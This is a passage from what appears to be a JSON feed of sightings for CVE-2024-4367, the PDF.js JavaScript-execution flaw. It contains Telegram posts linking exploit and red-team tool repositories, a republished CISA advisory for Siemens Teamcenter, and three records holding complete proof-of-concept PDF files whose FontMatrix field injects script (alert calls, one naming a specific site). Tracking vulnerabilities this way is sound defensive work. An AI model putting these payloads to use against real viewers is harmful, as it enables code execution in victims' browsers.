\u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u0432\u043b\u0438\u044f\u0442\u044c \u043d\u0430 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u044c \u0441\u0435\u0440\u0432\u0438\u0441\u0430.\n\n\u0414\u0430\u043d\u043d\u044b\u0445 \u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445 \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043e, \u0432\u043e \u0432\u0441\u044f\u043a\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043f\u043e\u043a\u0430.", "creation_timestamp": "2024-10-22T18:30:05.000000Z"}, {"uuid": "e1d555e9-f204-401d-962a-c550b3cebd36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2788", "content": "https://github.com/rzte/pdf-exploit\n\npdf exploit \u96c6\u6210 \uff08CVE-2024-4367\uff09\n#github #exploit #tools", "creation_timestamp": "2024-07-14T18:00:23.000000Z"}, {"uuid": "da5313ec-3b73-4c34-8da1-6cb5fa2ab23f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanInt/25308", "content": "Tools - Hackers Factory \n\nBloodHoundAD/BARK: BloodHound Attack Research Kit''\n\nhttps://github.com/BloodHoundAD/BARK\n\nCreate yourself #exp of CVE-2024-4367: PDF.js\n\nhttps://github.com/rzte/pdf-exploit\n\nCVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\n''GitHub - erebe/wstunnel: Tunnel all your traffic over Websocket or HTTP2 - Bypass firewalls/DPI - Static binary available''\n\nhttps://github.com/erebe/wstunnel\n\nOctoberfest7/MemFiles: A CobaltStrike toolkit to write files produced by Beacon to memory instead of disk''\n\nhttps://github.com/Octoberfest7/MemFiles\n\nelastic/SWAT: Simple Workspace Attack Tool (SWAT) is a tool for simulating malicious behavior against Google Workspace in reference to the MITRE ATT&CK framework.''\n\nhttps://github.com/elastic/SWAT\n\npmatula/Windows-Internals-Learning-Resources\n\nhttps://github.com/pmatula/Windows-Internals-Learning-Resources\n\nIntegration-IT/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.''\n\nhttps://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet\n\n0xEr3bus/RdpStrike: Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP.''\n\nhttps://github.com/0xEr3bus/RdpStrike\n\nwh0amitz/SharpADWS: Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS).''\n\nhttps://github.com/wh0amitz/SharpADWS\n\nsrlabs/Certiception: An ADCS honeypot to catch attackers in your internal network.''\n\nhttps://github.com/srlabs/Certiception\n\nmertdas/SharpIncrease: A Tool that aims to evade av with binary padding''\n\nhttps://github.com/mertdas/SharpIncrease\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-18T16:16:32.000000Z"}, {"uuid": "44cd60d8-a6b3-4d95-82b1-b4158a0f0b19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/8720", "content": "CVE-2024-4367 - Arbitrary JavaScript execution in PDF.js \u2014 Codean Labs\n\nhttps://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js/", "creation_timestamp": "2024-05-21T02:04:29.000000Z"}, {"uuid": "326139e1-8995-44c7-9c06-aa39ddc5e700", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2524", "content": "https://github.com/s4vvysec/CVE-2024-4367-POC\n\nCVE-2024-4367 arbitrary js execution in pdf js\n#github #poc", "creation_timestamp": "2024-05-22T09:08:19.000000Z"}, {"uuid": "0d0f2a42-9bca-4699-b0d5-dd1365dc45fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://gist.github.com/qxlmcr/99ec3095e0793023961c0c36d7278dae", "content": "%PDF-1.4\n%DUMMY\n8 0 obj\n<<\n/PatternType 2\n/Shading<<\n /Function<<\n /Domain[0 1]\n /C0[0 0 1]\n /C1[1 0.6 0]\n /N 1\n /FunctionType 2\n >>\n /ShadingType 2\n /Coords[46 400 537 400]\n /Extend[false false]\n /ColorSpace/DeviceRGB\n>>\n/Type/Pattern\n>>\nendobj\n5 0 obj\n<<\n/Widths[573 0 582 0 548 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n0 0 573 0 573 0 341]\n/Type/Font\n/BaseFont/PAXEKO+SourceSansPro-Bold\n/LastChar 102\n/Encoding/WinAnsiEncoding\n/FontMatrix [1 2 3 4 5 (0\\); alert\\('XSS via CVE-2024-4367 on beijingrun.btime.com'\\))]\n/Subtype/Type1\n/FirstChar 65\n/FontDescriptor 9 0 R\n>>\nendobj\n2 0 obj\n<<\n/Kids[3 0 R]\n/Type/Pages\n/Count 1\n>>\nendobj\n9 0 obj\n<<\n/Type/FontDescriptor\n/ItalicAngle 0\n/Ascent 751\n/FontBBox[-6 -12 579 713]\n/FontName/PAXEKO+SourceSansPro-Bold\n/StemV 100\n/CapHeight 713\n/Flags 32\n/FontFile3 10 0 R\n/Descent -173\n/MissingWidth 250\n>>\nendobj\n6 0 obj\n<<\n/Length 128\n>>\nstream\n47 379 489 230 re S\n/Pattern cs\nBT\n 50 500 Td\n 117 TL\n /F1 150 Tf\n /P1 scn\n (AbCdEf) Tj\n /P2 scn\n (AbCdEf) '\nET\nendstream\nendobj\n3 0 obj\n<<\n/Type/Page\n/Resources 4 0 R\n/Contents 6 0 R\n/Parent 2 0 R\n/MediaBox[0 0 595.2756 841.8898]\n>>\nendobj\n10 0 obj\n<<\n/Length 800\n/Subtype/Type2\n>>\nstream\n\nendstream\nendobj\n7 0 obj\n<<\n/PatternType 1\n/Matrix[1 0 0 1 50 0]\n/Length 58\n/TilingType 1\n/BBox[0 0 16 16]\n/YStep 16\n/PaintType 1\n/Resources<<\n>>\n/XStep 16\n>>\nstream\n0.65 g\n0 0 16 16 re f\n0.15 g\n0 0 8 8 re f\n8 8 8 8 re f\nendstream\nendobj\n4 0 obj\n<<\n/Pattern<<\n /P1 7 0 R\n /P2 8 0 R\n>>\n/Font<<\n /F1 5 0 R\n>>\n>>\nendobj\n1 0 obj\n<<\n/Pages 2 0 R\n/Type/Catalog\n/OpenAction[3 0 R /Fit]\n>>\nendobj\n\nxref\n0 11\n0000000000 65535 f\n0000002260 00000 n\n0000000522 00000 n\n0000000973 00000 n\n0000002178 00000 n\n0000000266 00000 n\n0000000794 00000 n\n0000001953 00000 n\n0000000015 00000 n\n0000000577 00000 n\n0000001085 00000 n\ntrailer\n<<\n/ID[(DUMMY) (DUMMY)]\n/Root 1 0 R\n/Size 11\n>>\nstartxref\n2333\n%%EOF\n", "creation_timestamp": "2026-05-12T05:58:05.000000Z"}, {"uuid": "534e7a11-e529-496b-ac5b-58318c3a2312", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10540", "content": "#exploit\n1. CVE-2024-32113:\nApache OFBiz Directory Traversal\nhttps://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit\n]-> https://github.com/Mr-xn/CVE-2024-32113\n\n2. CVE-2024-4367:\nArbitrary JavaScript execution in PDF.js\nhttps://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js\n\n3. CVE-2024-33559:\nWordPress Theme XStore 9.3.8 - SQLi\nhttps://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection", "creation_timestamp": "2024-06-06T05:45:52.000000Z"}, {"uuid": "0874fe67-5d37-4910-a9b2-ec4b936b5ffa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://gist.github.com/qxlmcr/8120e273c462aaa7eefe2e32d3288529", "content": "%PDF-1.4\n%DUMMY\n8 0 obj\n<<\n/PatternType 2\n/Shading<<\n /Function<<\n /Domain[0 1]\n /C0[0 0 1]\n /C1[1 0.6 0]\n /N 1\n /FunctionType 2\n >>\n /ShadingType 2\n /Coords[46 400 537 400]\n /Extend[false false]\n /ColorSpace/DeviceRGB\n>>\n/Type/Pattern\n>>\nendobj\n5 0 obj\n<<\n/Widths[573 0 582 0 548 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n0 0 573 0 573 0 341]\n/Type/Font\n/BaseFont/PAXEKO+SourceSansPro-Bold\n/LastChar 102\n/Encoding/WinAnsiEncoding\n/FontMatrix [1 2 3 4 5 (0\\); alert\\('XSS via CVE-2024-4367 on beijingrun.btime.com'\\))]\n/Subtype/Type1\n/FirstChar 65\n/FontDescriptor 9 0 R\n>>\nendobj\n2 0 obj\n<<\n/Kids[3 0 R]\n/Type/Pages\n/Count 1\n>>\nendobj\n9 0 obj\n<<\n/Type/FontDescriptor\n/ItalicAngle 0\n/Ascent 751\n/FontBBox[-6 -12 579 713]\n/FontName/PAXEKO+SourceSansPro-Bold\n/StemV 100\n/CapHeight 713\n/Flags 32\n/FontFile3 10 0 R\n/Descent -173\n/MissingWidth 250\n>>\nendobj\n6 0 obj\n<<\n/Length 128\n>>\nstream\n47 379 489 230 re S\n/Pattern cs\nBT\n 50 500 Td\n 117 TL\n /F1 150 Tf\n /P1 scn\n (AbCdEf) Tj\n /P2 scn\n (AbCdEf) '\nET\nendstream\nendobj\n3 0 obj\n<<\n/Type/Page\n/Resources 4 0 R\n/Contents 6 0 R\n/Parent 2 0 R\n/MediaBox[0 0 595.2756 841.8898]\n>>\nendobj\n10 0 obj\n<<\n/Length 800\n/Subtype/Type2\n>>\nstream\n\nendstream\nendobj\n7 0 obj\n<<\n/PatternType 1\n/Matrix[1 0 0 1 50 0]\n/Length 58\n/TilingType 1\n/BBox[0 0 16 16]\n/YStep 16\n/PaintType 1\n/Resources<<\n>>\n/XStep 16\n>>\nstream\n0.65 g\n0 0 16 16 re f\n0.15 g\n0 0 8 8 re f\n8 8 8 8 re f\nendstream\nendobj\n4 0 obj\n<<\n/Pattern<<\n /P1 7 0 R\n /P2 8 0 R\n>>\n/Font<<\n /F1 5 0 R\n>>\n>>\nendobj\n1 0 obj\n<<\n/Pages 2 0 R\n/Type/Catalog\n/OpenAction[3 0 R /Fit]\n>>\nendobj\n\nxref\n0 11\n0000000000 65535 f\n0000002260 00000 n\n0000000522 00000 n\n0000000973 00000 n\n0000002178 00000 n\n0000000266 00000 n\n0000000794 00000 n\n0000001953 00000 n\n0000000015 00000 n\n0000000577 00000 n\n0000001085 00000 n\ntrailer\n<<\n/ID[(DUMMY) (DUMMY)]\n/Root 1 0 R\n/Size 11\n>>\nstartxref\n2333\n%%EOF\n", "creation_timestamp": "2026-05-12T05:59:27.000000Z"}, {"uuid": "311c89a6-a0b4-4e0a-9faa-d107b0e7fe5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://gist.github.com/qxlmcr/6366e6a8b272867cb14c3c69bd465ed8", "content": "%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n\n2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n\n3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 595 842]\n   /Contents 4 0 R /Resources << /Font << /F1 5 0 R >> >>\n>>\nendobj\n\n4 0 obj\n<< /Length 44 >>\nstream\nBT\n/F1 36 Tf\n50 700 Td\n(Hello) Tj\nET\nendstream\nendobj\n\n5 0 obj\n<< /Type /Font /Subtype /Type1\n   /BaseFont /Helvetica\n   /FontMatrix [1 2 3 4 5 (0\\); alert\\('CVE-2024-4367 XSS on ' + window.location.hostname\\))]\n   /FirstChar 32 /LastChar 255\n   /Widths [250 250 250 250 250 250 250 250 250 250 250 250 250 250 250 250\n            250 250 250 250 250 250 250 250 250 250 250 250 250 250 250 250\n            250 250 250 250 250 250 250 250 250 250 250 250 250 250 250 250\n            250 250 250 250 250 250 250 250 250 250 250 250 250 250 250 250\n            250 250 250 250 250 250 250 250 250 250 250 250 250 250 250 250\n            250 250 250 250 250 250 250 250 250 250 250 250 250 250 250 250\n            250 250 250 250 250 250 250 250 250 250 250 250 250 250 250 250\n            250 250 250 250 250 250 250 250 250 250 250 250 250 250 250 250\n            250 250 250 250 250 250 250 250 250 250 250 250 250 250 250 250\n            250 250 250 250 250 250 250 250 250 250 250 250 250 250 250 250\n            250 250 250 250 250 250 250 250 250 250 250 250 250 250 250 250\n            250 250 250 250 250 250 250 250 250 250 250 250 250 250 250 250\n            250 250 250 250 250 250 250 250 250 250 250 250 250 250 250 250\n            250 250 250 250 250 250 250 250 250 250 250 250 250 250 250 250\n            250 250 250 250 250 250 250 250 250 250 250 250 250 250 250 250\n            250 250 250 250 250 250 250 250 250 250 250 250 250 250 250 250]\n   /FontDescriptor 6 0 R\n>>\nendobj\n\n6 0 obj\n<< /Type /FontDescriptor /FontName /Helvetica\n   /Flags 32 /ItalicAngle 0 /Ascent 770 /Descent -230\n   /CapHeight 770 /StemV 100\n   /FontBBox [-170 -230 1000 770]\n>>\nendobj\n\nxref\n0 7\n0000000000 65535 f \n0000000009 00000 n \n0000000059 00000 n \n0000000122 00000 n \n0000000271 00000 n \n0000000363 00000 n \n0000001033 00000 n \n\ntrailer\n<< /Size 7 /Root 1 0 R >>\nstartxref\n1103\n%%EOF\n", "creation_timestamp": "2026-05-12T06:04:21.000000Z"}, {"uuid": "4f57e73d-b0ff-430c-a465-16eccf676639", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/85069", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #XSS #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2024-4367-PDF.js-xss\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a xiaoqiesec0x1\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a PHP\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-20 16:28:06\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2024-4367\u2013PDF.js-xss\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-20T17:08:17.000000Z"}, {"uuid": "5e411773-3771-42a9-80c7-050f16e34b73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-134-04", "content": "View CSAF\n\nSummary\n\nSiemens Teamcenter is affected by multiple vulnerabilities which could potentially lead to a compromise in availability, integrity and confidentiality. Siemens has released new versions for the affected products and recommends to update to the latest versions.\n\nThe following versions of Siemens Teamcenter are affected:\n\n\n\nTeamcenter V2312 vers:intdot/<2312.0014, vers:intdot/<2312.0009 (CVE-2026-33862, CVE-2026-33893, CVE-2024-4367)\n\nTeamcenter V2406 vers:intdot/<2406.0012, vers:intdot/<2406.0006 (CVE-2026-33862, CVE-2026-33893, CVE-2024-4367)\n\nTeamcenter V2412 vers:intdot/<2412.0009 (CVE-2026-33862, CVE-2026-33893)\n\nTeamcenter V2506 vers:intdot/<2506.0005 (CVE-2026-33862, CVE-2026-33893)\n\nTeamcenter V2512 vers:all/* \n\n<div class=\"csaf-table\">\n\n\n\n\nCVSS\nVendor\nEquipment\nVulnerabilities\n\n\n\n\nv3 7.5\nSiemens\nSiemens Teamcenter\nImproper Check for Unusual or Exceptional Conditions, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Use of Hard-coded Credentials\n\n\n\n</div>\n\nBackground\n\n\n\nCritical Infrastructure Sectors: Critical Manufacturing\n\nCountries/Areas Deployed: Worldwide\n\nCompany Headquarters Location: Germany\n\n\n\n\nVulnerabilities\n<div class=\"csaf-accordion\">\n\nExpand All +\n<div class=\"csaf-accordion-item\">\n\nCVE-2024-4367\n<div class=\"csaf-accordion-content\">\n\nA type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox < 126, Firefox ESR < 115.11, and Thunderbird < 115.11.\n\nView CVE Details\n\n\n\nAffected Products\n\nSiemens Teamcenter\n<div class=\"ics-vendor-version-status\">\n<div class=\"ics-vendor\">Vendor:Siemens</div>\n<div class=\"ics-version\">Product Version:Teamcenter V2312, Teamcenter V2406</div>\n<div class=\"ics-status\">Product Status:known_affected, known_not_affected</div>\n</div>\n<div class=\"ics-remediations\">\n\nRemediations\n\nVendor fixUpdate to V2312.0009 or later versionhttps://support.sw.siemens.com/product/282219420/\n\nVendor fixUpdate to V2406.0006 or later versionhttps://support.sw.siemens.com/product/282219420/\n</div>\n\nRelevant CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions\n\n\n\nMetrics\n<div class=\"csaf-table csaf-metrics-table\">\n\n\n\n\nCVSS Version\nBase Score\nBase Severity\nVector String\n\n\n\n\n3.1\n5.6\nMEDIUM\nCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L\n\n\n\n</div>\n</div>\n</div>\n<div class=\"csaf-accordion-item\">\n\nCVE-2026-33862\n<div class=\"csaf-accordion-content\">\n\nThe affected application does not properly encode or filter user-supplied data. This could allow an attacker to inject malicious code that can be executed by other users when they visit the affected page.\n\nView CVE Details\n\n\n\nAffected Products\n\nSiemens Teamcenter\n<div class=\"ics-vendor-version-status\">\n<div class=\"ics-vendor\">Vendor:Siemens</div>\n<div class=\"ics-version\">Product Version:Teamcenter V2312, Teamcenter V2406, Teamcenter V2412, Teamcenter V2506</div>\n<div class=\"ics-status\">Product Status:known_affected, known_not_affected</div>\n</div>\n<div class=\"ics-remediations\">\n\nRemediations\n\nVendor fixUpdate to V2312.0014 or later versionhttps://support.sw.siemens.com/product/282219420/\n\nVendor fixUpdate to V2406.0012 or later versionhttps://support.sw.siemens.com/product/282219420/\n\nVendor fixUpdate to V2412.0009 or later versionhttps://support.sw.siemens.com/product/282219420/\n\nVendor fixUpdate to V2506.0005 or later versionhttps://support.sw.siemens.com/product/282219420/\n</div>\n\nRelevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n\n\n\nMetrics\n<div class=\"csaf-table csaf-metrics-table\">\n\n\n\n\nCVSS Version\nBase Score\nBase Severity\nVector String\n\n\n\n\n3.1\n7.3\nHIGH\nCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N\n\n\n\n</div>\n</div>\n</div>\n<div class=\"csaf-accordion-item\">\n\nCVE-2026-33893\n<div class=\"csaf-accordion-content\">\n\nThe affected application contains hardcoded key which is used for obfuscation stored directly into the application. This could allow an attacker to obtain these keys and misuse them to gain unauthorized access.\n\nView CVE Details\n\n\n\nAffected Products\n\nSiemens Teamcenter\n<div class=\"ics-vendor-version-status\">\n<div class=\"ics-vendor\">Vendor:Siemens</div>\n<div class=\"ics-version\">Product Version:Teamcenter V2312, Teamcenter V2406, Teamcenter V2412, Teamcenter V2506</div>\n<div class=\"ics-status\">Product Status:known_affected, known_not_affected</div>\n</div>\n<div class=\"ics-remediations\">\n\nRemediations\n\nVendor fixUpdate to V2312.0014 or later versionhttps://support.sw.siemens.com/product/282219420/\n\nVendor fixUpdate to V2406.0012 or later versionhttps://support.sw.siemens.com/product/282219420/\n\nVendor fixUpdate to V2412.0009 or later versionhttps://support.sw.siemens.com/product/282219420/\n\nVendor fixUpdate to V2506.0005 or later versionhttps://support.sw.siemens.com/product/282219420/\n</div>\n\nRelevant CWE: CWE-798 Use of Hard-coded Credentials\n\n\n\nMetrics\n<div class=\"csaf-table csaf-metrics-table\">\n\n\n\n\nCVSS Version\nBase Score\nBase Severity\nVector String\n\n\n\n\n3.1\n7.5\nHIGH\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n\n\n\n</div>\n</div>\n</div>\n</div>\n\n\n\nAcknowledgments\n\n\n\nDustin Born, Robin Plugge, and Tim W\u00f6rner of usd AG reported these vulnerabilities.\n\n\n\n\nGeneral Recommendations\n\nAs a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity\n\n\n\nAdditional Resources\n\nFor further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories\n\n\n\nTerms of Use\n\nThe use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.\n\n\n\nLegal Notice and Terms of Use\n\nThis product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).\n\n\n\nRecommended Practices\n\nCISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability.\n\nMinimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.\n\nLocate control system networks and remote devices behind firewalls and isolate them from business networks.\n\nWhen remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nCISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nCISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.\n\nOrganizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.\n\n\n\nAdvisory Conversion Disclaimer\n\nThis ICSA is a verbatim republication of Siemens ProductCERT SSA-827383 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided \"as-is\" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.\n\nRevision History\n\n\n\nInitial Release Date: 2026-05-12\n\n\n\n\n\nDate\nRevision\nSummary\n\n\n\n\n2026-05-12\n1\nPublication Date\n\n\n2026-05-14\n2\nInitial CISA Republication of Siemens ProductCERT SSA-827383 advisory\n\n\n\n\n\n\nLegal Notice and Terms of Use", "creation_timestamp": "2026-05-14T10:00:00.000000Z"}, {"uuid": "ca23904e-4aee-4c41-8f07-7bca840a6466", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4367", "type": "published-proof-of-concept", "source": "Telegram/Ut-FjakO3aXzYeDJVS314i2vHRpchsUAjvXH-nUbNwT5URU", "content": "", "creation_timestamp": "2026-05-20T21:00:04.000000Z"}]}